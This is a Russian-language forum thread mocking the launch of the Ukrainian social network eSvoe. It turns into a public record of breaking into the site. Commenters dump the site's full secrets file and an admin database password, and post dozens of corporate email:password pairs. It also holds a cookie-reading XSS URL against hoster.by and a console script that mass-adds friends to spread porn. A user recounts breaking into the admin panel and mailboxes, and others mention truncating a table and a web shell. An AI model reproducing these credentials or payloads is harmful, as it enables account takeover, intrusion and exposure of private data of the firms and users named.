1. PHP / Говнокод #23357

    0

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    Как слышно из новостей, сейчас вся Украина замерла в ожидании открытия некой невъебенной национальной социальной сети от какой-то
    хитрожопой дамы, решившей попилить бабло на горячей теме. Помпезный лендинг с формой подписки расположен по адресу: http://esvoe.com/
    Путём нехитрого перебора доменов первого уровня был установлен адрес тестового сайта: http://esvoe.com.ua/
    В общем, использоваться будет готовый говнодвижок "Socialite" (увидеть можно в директории "/public/"), листинг корневых сайтов виден
    всем желающим, а при тестировании используются такие нехитрые ники, как "Твоя мамка".
    
    Порядком подзаебла тема "моих", "национальных", "монетизированных" и тому подобных "социальных сетей". Смысла тягаться с "ВКонтакте"
    и "Facebook" нет как по причине необоримой узнаваемости данных брендов, так и по причине того, что мощность их дата-центров в охулиарды
    раз превышает мощность обоссаного VDS-а за какие-нибудь псят гривенок. Все, очевидно, забыли о быстром взлёте школьной поделки "Друзi"
    на nulled-версии "Vii Engine" до уровня в сто тысяч зарегистрированных пользователей и о последующем молниеносном скатывании в кучу
    бегемотьего навоза. Также никого ничему не научила история с белорусским клоном "ВКонтакте", "VSeti.By", на который в последние годы
    всем было похуй. 
    
    А чего стоят дешёвые приманки в стиле "платим рупь за пост"...

    Запостил: AnalPerOral, 24 Сентября 2017

    Комментарии (206) RSS

    • Похоже, что кто-то опять начал срать ворециями. 3.1415, ты ли это?
      Ответить
    • Не ошибается тот, кто ничего не делает.

      P.S. Сразу видно, что настоящий европейский сайт:
      http://esvoe.com.ua/storage/uploads/wallpapers/2017-09-13-06-26-40kvr-L7VQjbU.jpg
      Ответить
    • Прыщебляди красноглазые и свинособаки насрали себе в рот
      Ответить
    • http://esvoe.com/ - это типа "Ё-мое" ))))
      Ответить
    • На VSeti.By теперь висит унылый лендинг какого-то эраундера - очередного ведроид-онли убийцы гриндра - https://play.google.com/store/apps/details?id=at.arounder.android
      Забавляют комментарии на гугл-плее автора-бугуртня:
      Если у всех работает, а у вас нет, то нужно задуматься в первую очередь о том, что проблема с вашим телефоном / руками, а не писать ерунду в комментариях
      Впредь так и буду отвечать тестировщикам :3
      Ответить
      • Кстати, о белорусах. На правах офтопика:

        http://hoster.by/?error=Кто+в+2017+году+так+делает?

        P.S. Знаки < и > заменяются на & lt ; и на & gt ;
        " заменяется на & quot ;
        Ответить
        • По крайней мере, нынешние браузеры блокируют выполнение переданных через URL скриптов.
          Ответить
        • Ага, "заыскейпили", блять.
          https://hoster.by/?error=%27);alert(%27Your%20cookies:%20%27%252Bdocument.cookie);window.location=%27http:%252F%252Fesvoe.com%27%7D)%252F%252F
          Ответить
          • Гэта гамон!
            Ответить
          • Один алерт уже есть, поэтому код можно сократить:
            https://hoster.by/?error=Your%20cookies:%20%27%252Bdocument.cookie%29;window.location=%27http:%252F%252Fesvoe.com%27%7D%29%252F%252F
            Ответить
            • Удобно когда небольшая страна.

              Хостинг всегда на https://hoster.by/
              Интернет от http://provider.by/
              А купить что-то можно в shop.by
              Ответить
    • Всё, говносеть открылась. Зарегистрировался, чисто поржать, изучаю.
      Ответить
      • Зарегистрироваться-то зарегистрировался, да только при попытке открыть раздел "Люди" меня обдало душком 502-й ошибки. И дальше, как в тумане...
        Ответить
        • Туман развеялся, и я продолжил шествие по афинским развалинам. Как я и писал ранее, говносеть сляпана из "Socialite", который авторы сайта не потрудились хоть как-то усовершенствовать функционально, обратив всё своё внимание на создание красивого (ну, а хуле) дизайна и на вёрстку пустых, ничего не значащих, но многообещающих HTML-блоков типа "События" (с громогласным текстом-рыбой "295 374 участников") или "Предлагаемые группы" (где у каждой мифической группы строго "3 141(3 друзей)" участников). Раздела "Люди", как оказалось, не существует вообще.
          После пятиминутного изучения говнеца, вброшенного на обесточенный вентилятор, пришёл к выводу, что функционально создатели украинской "убийцы Facebook" никак не доработали "Socialite", и вводят публику в заблуждение путём расстановки неактивных статических блоков и ссылок. Девяноста процентов функционала, который обещает визуальный интерфейс, не существует.
          А теперь вспомним помпезный обратный отсчёт времени до открытия сайта, пафосные телерепортажи и общую шумиху в целом.
          Это оказалось ещё хуже, чем галимые "Друзi" (у которых хотя бы был весь функционал, достаточный для более-менее полноценного общения).
          Ответить
          • Раздел "Музыка" также оказался фикцией - доступна лишь вкладка "Онлайн-Радио" со спизженным откуда-то готовым виджетом; вкладки же "Моя музыка" и "Музыка друзей" неактивны, из чего делаем вывод, что ничего, кроме четырёх слов, они из себя не представляют.
            Зато, блядь, Flash-покер есть и он работает.
            Ответить
          • > вёрстку пустых, ничего не значащих, но многообещающих HTML-блоков типа "События" (с громогласным текстом-рыбой "295 374 участников") или "Предлагаемые группы" (где у каждой мифической группы строго "3 141(3 друзей)" участников)

            Антипаттерн «Дым и зеркала». Классика.
            Ответить
            • Говорят что в ВК в начале была такая херь: "уже зарегистрировано N" и это N увеличивалось джаваскриптом со случайной скоростью вообще без связи с сервером
              Ответить
              • Вот она: http://web.archive.org/web/20080710232717/http://vkontakte.ru:80/
                Ответить
                • Нас уже 14 485 260.

                  Гейтс напиздел айбиэму что у него уже есть дос, хотя его еще у него не было
                  Лебедев делал фейковые буклеты известных фирм и врал заказчику что это его портфолио (хотя эти фирмы о его сущестовании даже не знали)
                  Дуров врал что его уже 14 миллионов

                  Все врут
                  пиздец
                  Ответить
                  • У "eSvoe" всё гораздо проще - они гордо именуют себя "Першопрохідці".

                    https://esvoe.com/esvoe

                    "Прохідці" чего?

                    P.S.: масоньё за эти четыре года довело меня с этой украинской кампанией до того, что я теперь спокойно читаю любые тексты на украинском языке безо всяких онлайн-переводчиков, отлично понимая смысл.
                    Ответить
                  • > Гейтс напиздел айбиэму что у него уже есть дос, хотя его еще у него не было
                    > Все врут
                    Сёма, набиржу, Сёма!
                    Набирже всякая торговля без покрытия, кредитные деривативы и прочее тасование платных обещаний. А тут детские игры.
                    Ответить
    • APP_ENV=server
      APP_DEBUG=true
      APP_KEY=base64:KuxYYEfbhVuIZZAXV826Kk8U3 pBYnnJdaLZ3JJuuIVE=
      APP_URL=https://sand.esvoe.com
      APP_PAY=https://pay.esvoe.com
      PAY_IP=5.79.84.174
      STATIC_HOST=https://static.esvoe.com

      DB_CONNECTION=mysql
      DB_HOST=localhost
      DB_PORT=3306
      DB_DATABASE=esvoe_sand
      DB_USERNAME=worker
      DB_PASSWORD=VLKDK2L63T

      CACHE_DRIVER=redis
      SESSION_DRIVER=file
      QUEUE_DRIVER=sync

      REDIS_HOST=127.0.0.1
      REDIS_PASSWORD=null
      REDIS_PORT=6379

      MAIL_DRIVER=smtp
      MAIL_HOST=smtp.esvoe.com
      MAIL_PORT=25
      MAIL_USERNAME=info@esvoe.com
      MAIL_PASSWORD=L6b7H8r4
      MAIL_ENCRYPTION=none
      SWIFT_MAIL_LOG=true

      MAIL_NO_REPLAY=noreplay@esvoe.com
      MAIL_

      SOUNDCLOUD_CLIENT_ID=

      GOOGLE_MAPS_API_KEY=AIzaSyC1uxRdQYpbecjz CuZLo06Tny2tK0YcBGU

      NOCAPTCHA_SECRET=6LfTvSIUAAAAAKGqx0ueTrC oBAMYf2hiRTJpEpEP
      NOCAPTCHA_SITEKEY=6LfTvSIUAAAAAP4g9nbODA IZ7Fk2q-2nl3pKBsfJ

      STRIPE_KEY=pk_test_agFDnmOqOgaWuTkfCrFZO uqa


      BROADCAST_DRIVER=pusher
      PUSHER_APP_ID=367606
      PUSHER_APP_KEY=7a12cdebc837e00f059d
      PUSHER_APP_SECRET=31d726ecc82a15715c60
      PUSHER_APP_CLUSTER=eu

      FACEBOOK_CLIENT_ID=655007471371282
      FACEBOOK_CLIENT_SECRET=be79d92fe299e4ee8 f109643d7c88f4f

      GOOGLE_CLIENT_ID=735991831140-d12dj2cvdfdo1hq5a7knjadnjj7t0u06.apps.go ogleusercontent.com
      GOOGLE_CLIENT_SECRET=jHVZpLbrRmbDh9R2Rt7 UJzBm

      TWITTER_CLIENT_ID=
      TWITTER_CLIENT_SECRET=

      LINKEDIN_CLIENT_ID=
      LINKEDIN_CLIENT_SECRET=
      Ответить
      • Тяжёлый случай. Его ещё не дефейснули?
        Ответить
      • Есть ещё новости?
        Ответить
        • Есть. Взломана панель администратора и зарегистрированные пользователи с ID>=500 имеют возможность наблюдать во весь экран браузера фотографию неприличного содержания.
          Кстати, фурора что-то не наблюдается - на сайте всего лишь две тысячи триста зарегистрированных пользователей.
          Ответить
          • Напиши потом на хуябре как это гамно сломал. Интересно такие байки читать.
            Ответить
            • Аккаунта нет.
              Ответить
              • Создай. И напейши в песочницу.
                Ответить
                • Там это будет расценено, как обычное хвастовство (хотя и здесь не лучше).
                  Вкратце, суть в том, что вчера сайт после чьего-то очередного взлома (XSS-инъекция и белый экран) не работал часа два. Я периодически обновлял его. Наконец, он открылся; но разработчик позабыл (не заметив миниатюрную иконку) отключить встроенную в "Laravel" панель отладки "PHP". В оной же присутствует такая функция, как отладка не только текущего запроса, но и любых других запросов, произошедших за последнее время. Я произвёл поиск по параметру "URL", равному "/login", и параметру "Method", равному "POST", и нашёл несколько запросов авторизации, произведённых сразу после открытия сайта. Путём перебора значившихся в них авторизационных данных я обнаружил логин "worker" и пароль "socialite", которые и открыли мне доступ к панели администратора. Далее в общих настройках сайта оставалось лишь дописать необходимый JS-код в поле "Код Google Analytics".
                  Ответить
                  • А как подобрал логин и пароль?
                    Ответить
                    • >>>"Я произвёл поиск по параметру "URL", равному "/login", и параметру "Method", равному "POST", и нашёл несколько запросов авторизации, произведённых сразу после открытия сайта. Путём перебора значившихся в них авторизационных данных я обнаружил логин "worker" и пароль "socialite""
                      Ответить
                  • > панель отладки
                    > доступная всем подряд без аутентификации
                    Фееричный пиздец, конечно. Такие "фичи" специально запиливают, чтобы админы могли отстрелить себе ногу?
                    Ответить
                    • По всей видимости, она была включена на тестовом сайте (это уже их дело - имеют право), и при переносе файлов движка на рабочий сервер и открытии сайта разработчик не обратил на это внимания (так как по умолчанию, без соответствующей метки в "cookies", панель скрыта за расположенным в нижнем углу мелким значком 32х32).
                      Ответить
                      • Имхо, таким несекьюрным "фичам" даже на тестовом сервере не место. Мало ли - белый айпишник навесят на время какой-нибудь демонстрации или просто отрубить забудут.

                        > скрыта за значком
                        Security by obscurity во всей красе.
                        Ответить
                        • >>>"Security by obscurity во всей красе"

                          Тот же подход был использован и для "защиты" тестового сервера от левых заходов. Они решили, что "beta.", "alpha.", "test." и "dev." - слишком очевидно, и приняли решение использовать для тестов домен https://sand.esvoe.com. При этом по IP-адресу доступ всё так же не фильтруется.
                          Ответить
            • https://www.facebook.com/strumchinska

              Уже обсуждают.
              Ответить

              • > Мазур Олександра, я понимаю что вы распиарены и на этой волне хотите поднять бабла... Но если на вашем сайте будут и далее выпрыгивать гей-порно фото, толку будет мало...
                Ответить
          • Я предусмотрел, чтобы порнуха не демонстрировалась членам административного аппарата сети (путём условия "ID>=500"), так что они долго оставались в неведении (и Струмчинская даже успела записать и выложить очередное видеообращение, не потрудившись ознакомиться с комментариями к предыдущим постам), и веселуха в комментариях продолжалась ещё часа четыре. Но сейчас-то они, наконец, прозрели.
            Ответить
            • > Навіщо видавати готовий двигунець за інноваційний? Так, ніхто про це і не говорив, адже інноваційність соціальної мережі не в самому двигунці, а в можливостях я…

              Пиздец, валяюсь под столом от смеха, хахахаха
              Ответить
        • Есть уже и логин с паролем от production-БД, но воспользоваться ими мне пока не удаётся, так как "phpMyAdmin" или "adminer" я обнаружить не смог и БД защищена от внешних подключений.
          Ответить
          • Даже redis наружу не торчит, что для такого корыта даже удивительно.
            Ответить
            • Ничего удивительного. В убунте, на коей все это добро вертится, по дефолту редис слушает 127.0.0.1 онли. Так что разрабам просто повезло, что умные дяди уже всё сделали за них.
              Ответить
      • На https://pay.esvoe.com/ висит сайт:

        Відкриття вже скоро
        4 Днів 7 Годин 41 Хвилин 50 Секунд


        P.S. Радует эксклюзивная орфография: «Особыстий кабінет».

        В современной русской орфографии есть «и» и «ы», но нет «і».
        В современной белорусской орфографии есть «і» и «ы», но нет «и».
        В современной украинской орфографии есть «і» и «и», но нет «ы».

        У этих чертей есть все три буквы.
        Ответить
        • P.P.S. Счётчик увеличивается. Т. е. по факту он считает дни не ДО открытия, а ПОСЛЕ открытия.
          Ответить
        • Ылита, хулi.
          Ответить
        • Всё нормально, это по-русински. http://bit.ly/2xTeWbq
          Ответить
          • Кстати, короткие ссылки на статью:

            https://ru.wikipedia.org/w/?curid=11551

            https://ru.wikipedia.org/w/?oldid=87416705

            Способ получения ссылок описан в документации по API MediaWiki, но кто же его смотрит!
            Ответить
        • Вообще, мне нравится украинский язык с точки зрения того, что над написанными на нём текстами иногда можно неплохо поржать. Как пример, один из последних комментариев к официальному видео про инновационную сеть:

          >>>"після цього https://itmages.ru/image/view/6140463/88bb7ae5 хтось схоче мати справи із сайтом який контролює хєрзнахто?"

          Последнее слово очень интересное.
          Ответить
        • https://pay.esvoe.com открылся. Любопытно, что данные банковских карт они собирают самостоятельно, без независимого процессинга. Доверишь так им эту информацию, а потом Шура в один прекрасный день психанёт и почистит карты всех плательщиков...

          Интересна страница https://pay.esvoe.com/payment/done/90 - методом перебора номера транзакции можно смотреть любые чужие платежи.
          Ответить
          • > данные банковских карт они собирают самостоятельно
            > можно смотреть любые чужие платежи
            Репортни эту хуйню их банку, кстати. Есть вероятность, что кое-кто на время останется без платёжной системы.
            Ответить
            • Ещё мякотка: панель администратора "Pay" доступна без авторизации (sic!), что не особо удивляет, учитывая, что движок - самописный.

              https://pay.esvoe.com/admin/users

              В смысле, форма авторизации в панели администратора есть, но, как мы теперь видим, она не особо-то и нужна...
              Ответить
          • Номера транзакций можно вытащить из логов:
            https://pay.esvoe.com/admin/logs/2017/10/01/param_response.log
            Ответить
          • Кстати, Виталий Олейничук всё так же пользуется латвийской банковской картой (исходя из BIN-а):

            https://pay.esvoe.com/payment/done/130/
            Ответить
      • Если что:

        http://mail.esvoe.com/
        Логин и пароль выше.
        Ответить
        • Ну это уже совсем неспортивно...

          Кстати, популярный украинский сервис i.ua считает письма с сервера esvoe.com спамом и отправляет в карантин, так что у пользователей могут быть проблемы с активацией учёток.
          Ответить
        • Важно: если е-мейл адрес не верифицирован до Sun, Oct 1, 2017, доменные имена, указанные ниже, будут деактивированы.
          Доменные имена:
          esvoe.mobi
          esvoe.club
          esvoe.biz
          esvoe.org
          esvoe.net
          and 1 more
          Ответить
          • Самое смешное, что стоимость домена была указана в российских рублях.

            На Миротворец!
            Ответить
        • https://i.imgur.com/lXqyXWd.jpg
          Ответить
        • Было еще несколько безуспешных попыток пропиарить своё говно через педивикию, при чём с разными названиями статьи, типа, а вдруг не заметят, но коллективный разум так просто не проведешь, и статья была беспощадно выпилена. Ибо нехуй!
          Ответить
        • >> Я Сергій Козуля. Ліквідуйте мою сторінку в Є СВОЄ!!! Там спам порно і я не хочу бачити такого. Ви Обіцяли Захист Та Порядність. Майте Совість!!!
          Ответить
          • https://www.youtube.com/watch?v=ENSlTsi-vFY

            Как думаете, за спиной у Шуры действительно кипит работа или все эти мужики - статисты, научившиеся лишь с "умным" видом прокручивать туда-сюда консоль браузера с HTML-кодом?...
            И надо ли столько народу для того, чтобы сляпать сайт на готовом движке?
            Ответить
            • Может, он жс с ниграми ищет? Это смотрится всяко естественнее, чем медитация на программу ping, типа, смотрите, я погромист и хацкор, в консоли чёрной сижу. https://content.onliner.by/news/original_size/cced54199f2e4b6e4ed61c853ed5939d.jpeg
              Да и, на самом деле, я б тоже работать не смог, если бы за моей спиной шароёбились какие-то мудаки с камерой.
              Ответить
              • На фотке молодой специалист в области информационных технологий устанавливает инновационные программы -ping и tping на образовательные терминалы ВУЗов?
                Ответить
      • http://mail.esvoe.com/data/settings/settings.xml
        http://mail.esvoe.com/phpmyadmin/

        Программисты - просто заебца.
        Ответить
        • LOOOOOL
          Ответить
        • <AdminLogin>admin</AdminLogin>
          <AdminPassword>7f2yqfdt9O</AdminPassword>
          Ответить
          • Как раз только что получил доступ ко всем семидесяти шести корпоративным электронным почтовым ящикам, принадлежащим заправляющей "eSvoe.com" конторе. А всё лишь благодаря тупости разработчика, в результате которой пароль от БД остался открытым, а "phpMyAdmin" - доступным.
            Ответить
            • Да ты русский хакер. Тебя надо на пожизненное посадить
              Ответить
              • Тут опасаться нечего - я нахожусь в России, "eSvoe.com" - на Украине, их владельцы вообще в Латвии; а Интерпол мелкими делами не занимается. Да и "Tor"...
                Ответить
                • >>- я нахожусь в России, "eSvoe.com" - на Украине
                  hrookni, svinosobaka
                  Ответить
                  • пидарахи, вы зачем меня минусуете??
                    маму свою минусните
                    Ответить
        • <DBLogin>afterlogic</DBLogin>
          <DBPassword>7f2yqfdt9O</DBPassword>
          http://mail.esvoe.com/phpmyadmin/

          транкетнул таблицу
          Ответить
          • Я попытался зайти по этому логину/паролю. За мной уже выехали СБУшники?
            Ответить
            • Кстати, пароль от базы и от почты только что сменили. Они наконец-то заметили, что на их сервер ходят все, кому не лень.
              Ответить
    • Где всё? Там теперь живёт наш знакомый Андыр Констракшин.
      Ответить
      • Починили. Я там очень популярная. Стоило только группу создать, как в нее вступило 115 человек и 16 друзей! ^_^
        Ответить
        • Позавчера меня тоже уверяли, сразу после регистрации, что два мероприятия, численностью в 295 374 фантома каждое, никак не могут состояться без моего участия. Долго думал, к кому примкнуть.
          Ответить
    • info@parocareer.org:K0v0B9u0
      info@tomail.me:3J8u2Q9m
      info@g-card.eu:*#Kh$HZh2
      ingo@g-card.eu:DAJaiSHS2
      job@internetcash.org.uk:2A6g9G6o
      info@internetcash.org.uk:I8d5L8f3
      valerol@tomail.me:$oXkIDZ0
      vo@e-tickets.pro:7P2h1K9z
      info@webiq.org:M5q5V3a4
      info@pay-buy.shop:1S5w8N4i
      money@jetstart.club:6H6n1C6w
      info@high-risk.pro:5O0q4X6q
      admin@ukrprodukts.com:7G1p0Q2z
      admin@ukrproducts.com:O3d8B0a2
      info@ukrproducts.com:N4w3Y1f0
      info@ukrproducts.eu:Z2i8B0v7
      admin@ukrproducts.eu:2F5h1H0z
      admin@e-tickets.pro:M1a7U1x3
      admin@gastroli.cz:E9l0H4i4
      admin@paybillbox.com:4O0d1I4p
      info@paybillbox.com:A5v1R6w2
      ilja@ukrproducts.eu:5H6l8G4k
      twitter@ukrproducts.eu:4A0l6B7u
      info@dobrajagoda.com:M8v7T4w2
      tatiana@high-risk.pro:D4b1P4e5
      dmytro.shuliak@slokavo.lv:P3u1Y8r2
      tatiana@ukrproducts.eu:C6h5X4e2
      baltic.show@tomail.me:2I2m3C4r
      admin@afisha.it:9H0y0V2b
      mobiletechnologies@residenteu.com:1K7n0V 0t
      tradeservice@residenteu.com:1M6l8D4j
      admin@kvartal.lv:L1f5K2y9
      admin@emoney.plus:5A7v3D9r
      info@kvartal.lv:9E5u2O6s
      internetcash@tomail.me:H5r5Z6u2
      admin@baltic.show:9T4q6S2c
      admin@concertomania.ru:P6n8U9a1
      admin@kvytky.com.ua:8C1p6K9q
      pavel.bogdanov@tomail.me:1V5k5B5v
      admin@g-card.eu:5G8p4Y3d
      Ответить
      • admin@afisha.vip:O2x5V7u7
        rolands.saicans@tomail.me:T7v2N5z2
        serviceglobus@residenteu.com:0V6e2M9f
        info@baltic.show:D5w7P6x4
        info@afisha.vip:I5d3S9o7
        admin@g-card.club:A4t0H8c6
        info@slokavo.lv:M4o7R2w1
        info@e-tickets.pro:C6t1J0a0
        shuliak@slokavo.lv:4Z4r5I4l
        vladimir.jurmala@e-tickets.pro:O3p2Q3k2
        vitalik@baltic.show:E8m6M9a7
        admin@gastroli.top:P5s3C9u2
        admin@billing4shops.com:5K4t2U5e
        gastroli@gastroli.top:S9e0Y8w1
        info@gastroli.top:Y7f2R8y8
        info@futureworldinternational.org:1O2m3S 5a
        admin@futureworldinternational.org:D5b3Q 1nCD
        admin@internetcash.company:2A0i6B9c
        admin@vstupenkyprovas.cz:G6o0V7p7
        dmytro.shuliak@ukrproducts.eu:4F6m1J3v
        support@internetcash.org.uk:M2u1U4w1
        user@pay-card.eu:2B2z3D5n
        admin@esvoe.com:8N7i2M9a
        finance@g-card.eu:S6k7K7r6
        admin@pokermegaclub.com:5I6z5T8n
        info@esvoe.com:Q5n7O2e2
        pay@esvoe.com:0X4d2S9g
        Freelancer@Internetcash.company:S5e0V1u7
        admin@cardsbin.com:T0h7F8s5
        admin@worldgamblinglegal.com:E5t7Q4o0
        yan@ukrproducts.eu:I1z3K2h8
        job@esvoe.com:7G8p9J8z
        eportnova@esvoe.com:H3o7V4d4
        admin@internetcash.org.uk:8Z3n8D3k
        info@artist-shop.com.ua:O1o2W6q0
        info@intermegashop.com:A7e0D0p3
        Ответить
        • Особого внимания заслуживают ящики с доменом "esvoe.com".
          Короче, эти дебилы, ещё нихуя не раскрутившись, уже делают заказы на сувенирные кружки и футболки с логотипом своей говносети, в надежде толкнуть этот хлам каким-нибудь лохам.
          Ответить
          • Также там можно найти подготовленные к печати коды скретч-карт для поповнення гаманця.
            Ответить
        • Они вообще в курсе что происходит?
          Ответить
          • Говнокод на третьей странице Гугла по запросу «esvoe». Так что теперь, вероятно, в курсе.
            Ответить
            • http://comandir.com/2017/09/30/196194-zapusk-novoj-ukrainskoj-socseti-esvoe-obernulsya-konfuzom.html

              Запуск новой украинской соцсети eSvoe обернулся конфузом
              , информирует comandir.com.

              Пишут что вот эта девочка писала esvoe: https://www.instagram.com/strumchinska/

              Блин, лучше бы хотя бы питончик с джагой выучила, чем на пхп с mysql-то хуячить.
              DjangoGirls же есть в Украине
              Ответить
              • Если бы писала. Тупо спиздила готовый движок, не заплатив, вероятно, и тех пресловутых сорока пяти долларов, о которых трындит весь "FaceBook". Я сам уже нашёл и скачал архив с движком нахаляву.
                Ответить
            • > Говнокод на третьей странице Гугла по запросу «esvoe»

              "на третьей странице Гугла" это практически "не существует". Проверил в incognito mode, у меня на 4 странице.
              Ответить
    • https://youtu.be/jsUI7tDvmR4?t=20m11s
      Ответить
    • http://politikus.ru/events/99752-zapusk-novoy-ukrainskoy-socseti-esvoe-obernulsya-konfuzom.html

      И почему-то ни слова про гей-порно.
      Ответить
    • О, еще один убийца ВК.
      https://ц.укр/
      Ответить
      • > Перенесіть все з VK

        Для того, чтобы авторизоваться в VK, нужно... иметь доступ к VK, которого в незалежной сейчас официально нет.
        Ответить
    • Все, кто ругают эту соцсеть, просто застряли в 20м веке и не понимают, как должны делаться продукты. Они всё правильно сделали: зарелизили minimal value package.
      Ответить
    • Короче, ещё один прелюбопытнейший моментик: пользователь видит в общей ленте не только посты от "друзей", но и от тех, кто только отправил ему заявку в друзья. Таким образом можно неплохо мусорить в масштабах нескольких тысяч пользователей (я снова вернулся к любимой теме с фотографиями стиля "ню"), просто автоматизированно разослав всем пользователям заявки в друзья.

      for(i=1;i<=4000;i++){
      $.post('/friend/ajax/add', 'user_id='+i+'&_token='+($('meta[name=csrf_token]').attr('content')));
      }


      Запускаем этот скрипт в консоли браузера, ждём минут пять, чтобы все запросы обработались, после чего постим в ленту всё, что угодно. Эффект подтверждён - уведомления о жалобах приходят едва ли не ежесекундно.
      Ответить
      • Чувак, ты реально крэйзи.
        Ответить
        • Да, я псих.
          Ответить
          • Попробуй ещё как-нибудь денег заработать на е-свое. Рекламу, например, сделать кому-нибудь этим способом с лентой. Тебя гусары в полку на руках носить будут.
            В казино вулкан во всю эту ебалу напиши. Там в постах вроде теги работают, на ютубе видел человек <marquee> встраивал, может там можно заембедить прямо флешку с рекламой.
            Ответить
      • Они догадались до csrf_token, ну нихуя себе!
        Ответить
    • в видео на ютюб (на украинском языке) пытался донести до социума что не надо бл*ать создавать свои говносоциалки, к-во которых в Украине уже доходит до сотни... вчера получил звонок от человека, который предлагал сотрудничество. как вы думаете какой проект у него был? )))))))))))
      более любопытный видос вышел немного раньше, после которого Олександра таки сказала у себя на фб страничке, что это движок (не уточнила правда, какой), и что инновации не в нем! а в чем бл*ть инновации? в дырах и в х*ях?
      дизайн украденый с сайта евровет http://euro.vet . впрочем что я... https://www.youtube.com/watch?v=OEaBh55TNkI&t=4s тут для поржать, вот.

      п.с. я не хотел никогда быть видеоблоггером, но действия Струмчинской просто порвали мой пердак. 2 видео за неделю! при том что до этого я никогда ни чего не снимал.

      п.п.с.
      кстати это не она автор проекта, она собрала солянку из предыдущих вариантов, нашла быдлокодеров, которые под руководством политдеятеля https://www.facebook.com/slokavo - создают этот сайт за деньги налогоплательщиков.

      п.п.п.с.
      но самое веселое видео, это где она показывала разработчиков (в кавычках) данного сайта, у которых на столах кубик-рубик, маленький кактус, и даже пустой стаканчик под вискарь ))))). у разработчиков на мониторах было открыто сами знаете что ))), это уже сверху написано, тоесть чистый фарс.
      Ответить
      • https://www.youtube.com/watch?v=jsUI7tDvmR4

        Твоё видео? Ты меня на 22:38 назвал "школяром"?
        Ответить
        • видео не мое, но на видео я. если ты не понимаешь контекста, то я поясню.
          суть мысли была в том, что сайт может взломать даже школяр. это раз.
          два - твой взлом, который ты делал с этими педерастическими фотками это реально баловство, которое свойственно школоте, взрослый человек скорее воспользуется дырой в свою пользу, либо же просто сообщит.

          устали спорить с создателями этого Гэ, и решили не помогать им в прямом, и переносном смысле, пускай сами ищут дыры.

          а тебя это обидело????
          Ответить
          • >>>"а тебя это обидело????"

            Никак нет.
            "Клубничка" была показана для того, чтобы слегка сбить спесь с Шуры, уверенной в том, что мелкие, как ей казалось, ошибки останутся незамеченными или что общество ей их легко простит. Благодаря специальному условию в коде Шура и её помощнички долго не видели "клубничку" (пока остальная толпа вовсю рыготала над нею в "FaceBook"), и прознали о ней, когда было уже поздно и нельзя было надеяться на плохую память народа.
            Выше я уже описал - функционала там минимум, и основную визуальную часть сайта составляют статические HTML-блоки с фейковой информацией (типа "События" и "Предлагаемые группы"). "Музыки" нет, "Людей" нет, "Доски объявлений" нет, инноваций нет; зато покер есть.
            Ответить
            • дальше больше. был до этого пару месяцев назад такой сайт как ц.укр
              на котором парни используют vii в качестве двигана, и впаривают людям, что там 300 тыщ регистраций, хотя на самом деле там и ста нет ))). а предустановленные примочки движка и плагины потом указывают как инновации ))).

              вобще. уже со времен существования секты свидетелей Струмчинской слово инновации начало у меня вызывать какой-то внезапный ржач.
              даже когда я его слышал уже вне разговоров про есвое я еле сдерживаюсь ))).

              в видео я указывал на одно из видео в ютюбе, в котором показывается фокус с мишкой, который портит на нет интерфейс есвое.

              п.с. название проекта скорее для алкашей. бухать будешь? нет, я со своим. прямой перевод ))). тем более что на презентации они раздавали сувенирные кружки, якобы намекая ))))))
              Ответить
              • В одном из почтовых ящиков как раз была найдена переписка за 26-е и 27-е сентября, в ходе которой они договаривались с некоей студией печати об изготовлении и поставке футболок, кружек и, зачем-то, картонных коробок с символикой сайта. Помимо этого, был обнаружен список кодов готовившихся к печати скретч-карт для пополнения внутреннего счёта на сайте.

                P.S.: Ты был на презентации? Если да, то шла ли там речь о скретч-картах? И есть ли видеозапись презентации?
                Ответить
                • я там выше оставил ссылку на ютюб политдеятеля, где есть видосы с телефона с презентации, и послепрезентационная содомия. самой презентации там было пару минут для сми, а потом пьянка, видимо твои проделки обмывали. а нашу помятую пионер-вожатую там тоже видно ))). весело, однако.
                  Ответить
                • Это правильно.

                  Когда делаешь свой интернет-стартап надо всегда начинать с чашек с логотипом. Остальное приложится.
                  Ответить
              • vii в качестве двигана и vi в качестве IDE
                Ответить
          • Рекомендую ознакомиться со всем содержимым данного поста - возможно, оно окажется неплохим материалом для следующего видео. Вкратце: взлом удался из-за того, что разработчик сайта (не то владелец кактуса, не то игрок в кубик Рубика) оставил к панели администратора пароль по умолчанию ("socialite"); далее мне оставалось лишь вставить код, демонстрирующий боди-арт почти всем пользователям. Затем был получен доступ ко всем корпоративным электронным почтовым ящикам их конторы (почему-то там слишком часто фигурировала Латвия) благодаря плававшему на поверхности паролю к базе данных. Наконец, сегодня обнаружилось, что можно добавить за один раз всех пользователей сайта к себе в друзья и публиковать в ленту на весь сайт всё, что угодно.
            Ответить
            • а благодаря всем раскладам за последнюю неделю, и новостям исходящих - имеем такие вот замечательные мемасики https://image.ibb.co/icdB5b/22237054_1797166303644280_1655418501_n.j pg
              Ответить
      • Чувак, можно коротко, ты кто?
        Ответить
        • Бородатый из того видео, насколько я понял.
          Ответить
    • http://archive.li/*.esvoe.com

      Просто оставлю это здесь.
      Ответить
    • https://www.youtube.com/watch?v=q2Gx3rYB9lE украиноязычное видео, сборная солянка новых фактов
      Ответить
      • https://kvartal.lv/admin/users — что-то мне это напоминает...
        Ответить
        • дааааа, знакомо ) неужели социалайт? тот самый?
          Ответить
          • <script type="text/javascript" src="https://pastebin.com/raw/7VFsBFUS"></script>


            Даже без гей-порно. Это точно не AnalPerOral первым нашёл.

            P.S. Отсюда:
            https://kvartal.lv/admin/html_page?type=edit&id=1
            Ответить
            • Что именно не я первым нашёл?
              Ответить
              • kvartal.lv.

                Иначе бы на нём был Anal или Oral.
                Ответить
                • Про этот сайт мне вообще не было известно - я сконцентрировался чисто на "eSvoe".
                  Ответить
                • Кстати, никто ещё не понял, как загрузить web-шелл на "Pay"? Это как бы до смешного элементарно...
                  Ответить
        • https://adminlte.io/
          Ну шаблончик швабодный, так что ничего удивительного. Но вот откуда они все этот дырявый бекенд тянут...
          Ответить
          • На euro.vet такую же дыру прикрыли. Хотя... кто знает.

            http://euro.vet/phpmyadmin/
            Ответить
            • Почему когда я вижу такой фейл и пиздец там всегда phpmyadmin, php и mysql?

              почему никогда не бывает oracle и scala?
              Ответить
              • > там всегда mysql
                > никогда не бывает oracle
                Ты о чём?
                Ответить
              • http://lurkmore.to/ВиО#mws_49+KmaJ

